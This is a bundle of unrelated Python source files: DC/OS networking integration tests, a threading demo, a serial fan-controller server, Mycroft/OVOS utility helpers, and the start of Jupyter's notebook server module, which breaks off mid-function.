service_points = dcos_api_session.marathon.get_app_service_endpoints(app_definition['id'])
app_port = app_definition['container']['portMappings'][0]['containerPort']
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}:{}/ping'.format(service_points[1].ip, app_port)
ensure_routable(cmd, service_points[0].host, service_points[0].port)
@pytest.mark.parametrize('networking_mode', list(marathon.Network))
@pytest.mark.parametrize('host_port', [9999, 0])
def test_app_networking_mode_with_defined_container_port(dcos_api_session, networking_mode, host_port):
"""
The Admin Router can proxy a request on the `/service/[app]`
endpoint to an application running in a container in different networking
modes, with a manually or automatically assigned host port on which
the application's HTTP endpoint is exposed.
The networking modes tested cover the following configurations:
- host
- container
- container/bridge
https://mesosphere.github.io/marathon/docs/networking.html#networking-modes
"""
app_definition, test_uuid = test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP,
container_type=marathon.Container.DOCKER,
network=networking_mode,
host_port=host_port)
dcos_service_name = uuid.uuid4().hex
app_definition['labels'] = {
'DCOS_SERVICE_NAME': dcos_service_name,
'DCOS_SERVICE_PORT_INDEX': '0',
'DCOS_SERVICE_SCHEME': 'http',
}
# Arbitrary buffer time, accounting for propagation/processing delay.
buffer_time = 5
# Cache refresh in Adminrouter takes 30 seconds at most.
# CACHE_POLL_PERIOD=25s + valid=5s Nginx resolver DNS entry TTL
# https://github.com/dcos/dcos/blob/cb9105ee537cc44cbe63cc7c53b3b01b764703a0/
# packages/adminrouter/extra/src/includes/http/master.conf#L21
adminrouter_default_refresh = 25 + 5 + buffer_time
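# With the constants above this works out to 25 + 5 + 5 = 35 seconds.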
app_id = app_definition['id']
app_instances = app_definition['instances']
app_definition['constraints'] = [['hostname', 'UNIQUE']]
# For the routing check to work, two conditions must be true:
#
# 1. The application must be deployed, so that `/ping` responds with 200.
# 2. The Admin Router routing layer must not be using an outdated
# version of the Nginx resolver cache.
#
# We therefore wait until these conditions have certainly been met.
# We wait for the Admin Router cache refresh first so that there is
# unlikely to be much double-waiting. That is, we do not want to be waiting
# for the cache to refresh when it already refreshed while we were waiting
# for the app to become healthy.
with dcos_api_session.marathon.deploy_and_cleanup(app_definition, check_health=False):
time.sleep(adminrouter_default_refresh)
dcos_api_session.marathon.wait_for_app_deployment(
app_id=app_id,
app_instances=app_instances,
check_health=False,
ignore_failed_tasks=False,
timeout=1200,
)
r = dcos_api_session.get('/service/' + dcos_service_name + '/ping')
assert r.status_code == 200
assert 'pong' in r.json()
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def geturl(url):
rs = requests.get(url)
assert rs.status_code == 200
r = rs.json()
log.info('geturl {} -> {}'.format(url, r))
return r
def test_l4lb(dcos_api_session):
'''Test l4lb is load balancing between all the backends
* create 5 apps using the same VIP
* get uuid from the VIP in parallel from many threads
* verify that 5 uuids have been returned
* only testing if all 5 are hit at least once
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
numapps = 5
numthreads = numapps * 4
apps = []
rvs = deque()
backends = []
dnsname = 'l4lbtest.marathon.l4lb.thisdcos.directory:5000'
with contextlib.ExitStack() as stack:
for _ in range(numapps):
origin_app, origin_uuid = \
test_helpers.marathon_test_app(
healthcheck_protocol=marathon.Healthcheck.MESOS_HTTP)
# same vip for all the apps
origin_app['portDefinitions'][0]['labels'] = {'VIP_0': '/l4lbtest:5000'}
apps.append(origin_app)
stack.enter_context(dcos_api_session.marathon.deploy_and_cleanup(origin_app))
sp = dcos_api_session.marathon.get_app_service_endpoints(origin_app['id'])
backends.append({'port': sp[0].port, 'ip': sp[0].host})
# make sure that the service point responds
geturl('http://{}:{}/ping'.format(sp[0].host, sp[0].port))
# make sure that the VIP is responding too
geturl('http://{}/ping'.format(dnsname))
vips = geturl("http://localhost:62080/v1/vips")
[vip] = [vip for vip in vips if vip['vip'] == dnsname and vip['protocol'] == 'tcp']
for backend in vip['backend']:
backends.remove(backend)
assert backends == []
# do many requests in parallel.
def thread_request():
# deque is thread safe
rvs.append(geturl('http://l4lbtest.marathon.l4lb.thisdcos.directory:5000/test_uuid'))
threads = [threading.Thread(target=thread_request) for i in range(0, numthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
expected_uuids = [a['id'].split('-')[2] for a in apps]
received_uuids = [r['test_uuid'] for r in rvs if r is not None]
assert len(set(expected_uuids)) == numapps
assert len(set(received_uuids)) == numapps
assert set(expected_uuids) == set(received_uuids)
def test_dcos_cni_l4lb(dcos_api_session):
'''
This tests the `dcos-l4lb` CNI plugin:
https://github.com/dcos/dcos-cni/tree/master/cmd/l4lb
The `dcos-l4lb` CNI plugin allows containers running on networks that don't
necessarily have routes to spartan interfaces and minuteman VIPs to consume DNS
service from spartan and layer-4 load-balancing services from minuteman by
injecting spartan and minuteman services into the container's network
namespace. You can read more about the motivation for this CNI plugin and type
of problems it solves in this design doc:
https://docs.google.com/document/d/1xxvkFknC56hF-EcDmZ9tzKsGiZdGKBUPfrPKYs85j1k/edit?usp=sharing
In order to test the `dcos-l4lb` CNI plugin we emulate a virtual network that
lacks routes for spartan interface and minuteman VIPs. In this test, we
first install a virtual network called `spartan-net` on one of the agents.
The `spartan-net` is a CNI network that is a simple BRIDGE network with the
caveat that it doesn't have any default routes. `spartan-net` has routes
only for the agent network. In other words it doesn't have any routes
towards the spartan-interfaces or minuteman VIPs.
We then run a server (our python ping-pong server) on the DC/OS overlay.
Finally, to test that the `dcos-l4lb` plugin, which is also part of
`spartan-net`, is able to inject the Minuteman and Spartan services into the
container's netns, we start a client on the `spartan-net` and try to `curl` the
`ping-pong` server using its VIP. Without the Minuteman and Spartan services
injected in the container's netns the expectation would be that this `curl`
would fail, with a successful `curl` execution on the VIP allowing the
test-case to PASS.
'''
if not lb_enabled():
pytest.skip('Load Balancer disabled')
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup CNI config with EE strict mode enabled')
# Run all the test application on the first agent node
host = dcos_api_session.slaves[0]
# CNI configuration of `spartan-net`.
spartan_net = {
'cniVersion': '0.2.0',
'name': 'spartan-net',
'type': 'dcos-l4lb',
'delegate': {
'type': 'mesos-cni-port-mapper',
'excludeDevices': ['sprt-cni0'],
'chain': 'spartan-net',
'delegate': {
'type': 'bridge',
'bridge': 'sprt-cni0',
'ipMasq': True,
'isGateway': True,
'ipam': {
'type': 'host-local',
'subnet': '192.168.250.0/24',
'routes': [
# Reachability to DC/OS overlay.
{'dst': '9.0.0.0/8'},
# Reachability to all private address subnet. We need
# this reachability since different cloud providers use
# different private address spaces to launch tenant
# networks.
{'dst': '10.0.0.0/8'},
{'dst': '172.16.0.0/12'},
{'dst': '192.168.0.0/16'}
]
}
}
}
}
log.info("spartan-net config:{}".format(json.dumps(spartan_net)))
# Application to deploy CNI configuration.
cni_config_app = MarathonApp(
marathon.Container.NONE, marathon.Network.HOST, host,
app_name_fmt='/integration-test/cni-l4lb/config-{}')
# Override the default test app command with a command to write the CNI
# configuration.
#
# NOTE: We add the original command at the end of this command so that the task
# stays alive for the test harness to make sure that the task got deployed.
# Ideally we should be able to deploy one of tasks using the test harness
# but that doesn't seem to be the case here.
cni_config_app.app['cmd'] = \
"echo '{}' > {} && {}".format(
json.dumps(spartan_net),
'/opt/mesosphere/etc/dcos/network/cni/spartan.cni',
cni_config_app.app['cmd'])
log.info("CNI Config application: {}".format(cni_config_app.app))
try:
cni_config_app.deploy(dcos_api_session)
cni_config_app.wait(dcos_api_session)
finally:
cni_config_app.purge(dcos_api_session)
log.info("CNI Config has been deployed on {}".format(host))
# `spartan-net` is now installed on `host`. Launch the test app on the
# DC/OS overlay on that agent, with a VIP.
server_vip_label = '/spartanvip:10000'
server_vip_addr = 'spartanvip.marathon.l4lb.thisdcos.directory:10000'
# Launch the test_server in ip-per-container mode (user network)
server_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
vip=server_vip_label, app_name_fmt='/integration-test/cni-l4lb/server-{}')
log.info("Server application: {}".format(server_app.app))
# Get the client app on the 'spartan-net' network.
client_app = MarathonApp(
marathon.Container.MESOS, marathon.Network.USER, host,
network_name='spartan-net', app_name_fmt='/integration-test/cni-l4lb/client-{}')
log.info("Client application: {}".format(client_app.app))
try:
# Launch the test application
client_app.deploy(dcos_api_session)
server_app.deploy(dcos_api_session)
# Wait for the test application
server_app.wait(dcos_api_session)
client_app.wait(dcos_api_session)
client_host, client_port = client_app.hostport(dcos_api_session)
# Check linux kernel version
uname = ensure_routable('uname -r', client_host, client_port, json_output=False)
if '3.10.0-862' <= uname < '3.10.0-898':
return pytest.skip('See https://bugzilla.redhat.com/show_bug.cgi?id=1572983')
# Change the client command task to do a curl on the server we just deployed.
cmd = '/opt/mesosphere/bin/curl -s -f -m 5 http://{}/test_uuid'.format(server_vip_addr)
assert ensure_routable(cmd, client_host, client_port)['test_uuid'] == server_app.uuid
finally:
server_app.purge(dcos_api_session)
client_app.purge(dcos_api_session)
def enum2str(value):
return str(value).split('.')[-1].lower()
def net2str(value, ipv6):
return enum2str(value) if not ipv6 else 'ipv6'
@retrying.retry(wait_fixed=2000,
stop_max_delay=100 * 2000,
retry_on_exception=lambda x: True)
def test_dcos_net_cluster_identity(dcos_api_session):
cluster_id = 'minuteman' # default
expanded_config = test_helpers.get_expanded_config()
if expanded_config['dcos_net_cluster_identity'] == 'true':
with open('/var/lib/dcos/cluster-id') as f:
cluster_id = "'{}'".format(f.readline().rstrip())
argv = ['sudo', '/opt/mesosphere/bin/dcos-net-env', 'eval', 'erlang:get_cookie().']
cookie = subprocess.check_output(argv, stderr=subprocess.STDOUT).decode('utf-8').rstrip()
assert cluster_id == cookie, "cluster_id: {}, cookie: {}".format(cluster_id, cookie)
|
identifyingThreads.py
|
import threading
import time
def myThread():
print("Thread {} starting".format(threading.currentThread().getName()))
time.sleep(10)
print("Thread {} ending".format(threading.currentThread().getName()))
for i in range(4):
threadName = "Thread-" + str(i)
thread = threading.Thread(name=threadName, target=myThread)
thread.start()
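# The workers are non-daemon threads that sleep for 10 seconds and are never
# joined, so the enumerate() call below lists MainThread together with the
# already-started worker threads.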
print("{}".format(threading.enumerate()))
|
fanCtrl.server.py
|
import sys, getopt, serial
import threading
import time
import os
import os.path
lines = -2
lastRecivedLine = ""
logEnabled = False
logFile = ""
lockFile = "/tmp/fanController.lock"
def createRunLock():
outputFileHandler = open(lockFile,"a")
outputFileHandler.write("lock\r\n")
outputFileHandler.close()
def rmRunLock():
os.remove(lockFile)
def checkRunLock():
if os.path.exists(lockFile):
sys.exit(0)
else:
createRunLock()
def log(data):
if logEnabled == True:
outputFileHandler = open(logFile,"a")
outputFileHandler.write(data+"\r\n")
outputFileHandler.close()
def closeApplication(run_event, thread):
print "stop."
if run_event != None:
run_event.clear()
if thread != None:
thread.join()
rmRunLock()
# print "threads successfully closed"
def readSerialData(ser,run_event):
outputFile = "/tmp/fanController/output"
global lines
global lastRecivedLine
while run_event.is_set():
# print str(lines)+ " '"+lastRecivedLine+"'"
reading = ser.readline().decode()
if len(reading) > 0:
reading = reading[:-1]
lastRecivedLine = reading
lines = lines + 1
outputData = "[recv] "+str(reading)
outputFileHandler = open(outputFile,"a")
outputFileHandler.write(outputData+"\r\n")
outputFileHandler.close()
log(outputData)
print(outputData)
else:
lastRecivedLine = ""
time.sleep(1)
def sendSerialData(serial_port,data):
outputData = "[send] "+str(data)
log(outputData)
print(outputData)
serial_port.write((data + "\r\n").encode())
def usage():
print('fanCtrl.server.py -p[--port] <port> [-l[--log] <logfile>]')
sys.exit(2)
def main(argv):
global logEnabled
global logFile
inputFile = "/tmp/fanController/input"
port = ''
try:
opts, args = getopt.getopt(argv,"hp:l:",["port=","log="])
except getopt.GetoptError:
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-p", "--port"):
port = arg
elif opt in ("-l", "--log"):
logFile = arg
if port == "":
usage()
if len(logFile) > 0:
logEnabled = True
# print 'port is ', port
try:
serial_port = serial.Serial(port, 9600, timeout=0)
run_event = threading.Event()
run_event.set()
thread = threading.Thread(target=readSerialData, args=(serial_port,run_event,))
thread.start()
serial_port.write("hello\r\n")
time.sleep(3)
cmdSent = False
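# Simple file-based IPC: the loop below polls the input file once a second;
# when a client writes a command there, the trailing newline is stripped, the
# command is sent over the serial port, and the input file is removed.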
while True:
time.sleep(1)
if os.path.exists(inputFile):
inputFileHandler = open(inputFile,"r")
inputData = inputFileHandler.read()
inputData = inputData[:-1]
sendSerialData(serial_port, inputData)
inputFileHandler.close()
os.remove(inputFile)
pass
except KeyboardInterrupt:
print "Reviced KeyboardInterrupt"
closeApplication(run_event, thread)
except:
print "Error:"
print "Unexpected error:", sys.exc_info()
closeApplication(None, None)
if __name__ == "__main__":
checkRunLock()
if not os.path.exists("/tmp/fanController/"):
os.makedirs("/tmp/fanController/")
main(sys.argv[1:])
|
__init__.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from threading import Thread
from time import sleep
import requests
import os
from os.path import isdir, join
import re
import socket
def get_ip():
# taken from https://stackoverflow.com/a/28950776/13703283
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
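# (connecting a UDP socket sends no packets; it only selects a route, so
# getsockname() returns the address of the interface used for outbound traffic)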
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except Exception:
IP = '127.0.0.1'
finally:
s.close()
return IP
def get_external_ip():
return requests.get('https://api.ipify.org').text
def get_mycroft_root():
paths = [
"/opt/venvs/mycroft-core/lib/python3.7/site-packages/", # mark1/2
"/opt/venvs/mycroft-core/lib/python3.4/site-packages/ ", # old mark1 installs
"/home/pi/mycroft-core" # picroft
]
for p in paths:
if isdir(join(p, "mycroft")):
return p
return None
def resolve_resource_file(res_name, root_path=None):
"""Convert a resource into an absolute filename.
Resource names are in the form: 'filename.ext'
or 'path/filename.ext'
The system will look for ~/.mycroft/res_name first, and
if not found will look at /opt/mycroft/res_name,
then finally it will look for res_name in the 'mycroft/res'
folder of the source code package.
Example:
With mycroft running as the user 'bob', if you called
resolve_resource_file('snd/beep.wav')
it would return either '/home/bob/.mycroft/snd/beep.wav' or
'/opt/mycroft/snd/beep.wav' or '.../mycroft/res/snd/beep.wav',
where the '...' is replaced by the path where the package has
been installed.
Args:
res_name (str): a resource path/name
Returns:
str: path to resource or None if no resource found
"""
# TODO handle cyclic import
from ovos_utils.configuration import read_mycroft_config
config = read_mycroft_config()
# First look for fully qualified file (e.g. a user setting)
if os.path.isfile(res_name):
return res_name
# Now look for ~/.mycroft/res_name (in user folder)
filename = os.path.expanduser("~/.mycroft/" + res_name)
if os.path.isfile(filename):
return filename
# Next look for /opt/mycroft/res/res_name
data_dir = os.path.expanduser(config['data_dir'])
filename = os.path.expanduser(os.path.join(data_dir, res_name))
if os.path.isfile(filename):
return filename
# Finally look for it in the source package
paths = [
"/opt/venvs/mycroft-core/lib/python3.7/site-packages/", # mark1/2
"/opt/venvs/mycroft-core/lib/python3.4/site-packages/ ", # old mark1 installs
"/home/pi/mycroft-core" # picroft
]
if root_path:
paths += [root_path]
for p in paths:
filename = os.path.join(p, 'mycroft', 'res', res_name)
filename = os.path.abspath(os.path.normpath(filename))
if os.path.isfile(filename):
return filename
return None # Resource cannot be resolved
def create_daemon(target, args=(), kwargs=None):
"""Helper to quickly create and start a thread with daemon = True"""
t = Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def create_loop(target, interval, args=(), kwargs=None):
"""
Helper to quickly create and start a thread with daemon = True
and repeat it every interval seconds
"""
def loop(*args, **kwargs):
try:
while True:
target(*args, **kwargs)
sleep(interval)
except KeyboardInterrupt:
return
return create_daemon(loop, args, kwargs)
def wait_for_exit_signal():
"""Blocks until KeyboardInterrupt is received"""
try:
while True:
sleep(100)
except KeyboardInterrupt:
pass
def get_handler_name(handler):
"""Name (including class if available) of handler function.
Arguments:
handler (function): Function to be named
Returns:
string: handler name as string
"""
if '__self__' in dir(handler) and 'name' in dir(handler.__self__):
return handler.__self__.name + '.' + handler.__name__
else:
return handler.__name__
def camel_case_split(identifier: str) -> str:
"""Split camel case string"""
regex = '.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)'
matches = re.finditer(regex, identifier)
return ' '.join([m.group(0) for m in matches])
def rotate_list(l, n=1):
return l[n:] + l[:n]
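# Hedged usage sketch (not part of the original module): exercises the pure
# string/list helpers above when this file is run directly; nothing here needs
# a Mycroft installation or network access.
if __name__ == "__main__":
    print(camel_case_split("MycroftSkillLoader"))  # -> "Mycroft Skill Loader"
    print(get_handler_name(camel_case_split))      # -> "camel_case_split"
    print(rotate_list([1, 2, 3, 4]))               # -> [2, 3, 4, 1]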
|
notebookapp.py
|
"""A tornado based Jupyter notebook server."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import notebook
import asyncio
import binascii
import datetime
import errno
import functools
import gettext
import hashlib
import hmac
import importlib
import io
import ipaddress
import json
import logging
import mimetypes
import os
import random
import re
import select
import signal
import socket
import stat
import sys
import tempfile
import threading
import time
import warnings
import webbrowser
try:
import resource
except ImportError:
# Windows
resource = None
from base64 import encodebytes
from jinja2 import Environment, FileSystemLoader
from notebook.transutils import trans, _
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado >= 5.0
try:
import tornado
except ImportError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0")) from e
try:
version_info = tornado.version_info
except AttributeError as e:
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have < 1.1.0")) from e
if version_info < (5,0):
raise ImportError(_("The Jupyter Notebook requires tornado >= 5.0, but you have %s") % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.httputil import url_concat
from tornado.log import LogFormatter, app_log, access_log, gen_log
if not sys.platform.startswith('win'):
from tornado.netutil import bind_unix_socket
from notebook import (
DEFAULT_NOTEBOOK_PORT,
DEFAULT_STATIC_FILES_PATH,
DEFAULT_TEMPLATE_PATH_LIST,
__version__,
)
from .base.handlers import Template404, RedirectWithParams
from .log import log_request
from .services.kernels.kernelmanager import MappingKernelManager, AsyncMappingKernelManager
from .services.config import ConfigManager
from .services.contents.manager import ContentsManager
from .services.contents.filemanager import FileContentsManager
from .services.contents.largefilemanager import LargeFileManager
from .services.sessions.sessionmanager import SessionManager
from .gateway.managers import GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient
from .auth.login import LoginHandler
from .auth.logout import LogoutHandler
from .base.handlers import FileFindHandler
from traitlets.config import Config
from traitlets.config.application import catch_config_error, boolean_flag
from jupyter_core.application import (
JupyterApp, base_flags, base_aliases,
)
from jupyter_core.paths import jupyter_config_path
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_client.session import Session
from nbformat.sign import NotebookNotary
from traitlets import (
Any, Dict, Unicode, Integer, List, Bool, Bytes, Instance,
TraitError, Type, Float, observe, default, validate
)
from ipython_genutils import py3compat
from jupyter_core.paths import jupyter_runtime_dir, jupyter_path
from notebook._sysinfo import get_sys_info
from ._tz import utcnow, utcfromtimestamp
from .utils import (
check_pid,
pathname2url,
run_sync,
unix_socket_in_use,
url_escape,
url_path_join,
urldecode_unix_socket_path,
urlencode_unix_socket,
urlencode_unix_socket_path,
urljoin,
)
# Check if we can use async kernel management
try:
from jupyter_client import AsyncMultiKernelManager
async_kernel_mgmt_available = True
except ImportError:
async_kernel_mgmt_available = False
# Tolerate missing terminado package.
try:
from .terminal import TerminalManager
terminado_available = True
except ImportError:
terminado_available = False
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
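# For example, random_ports(8888, 8) yields 8888..8892 followed by three ports
# drawn from [8872, 8904] (clamped to be at least 1).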
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
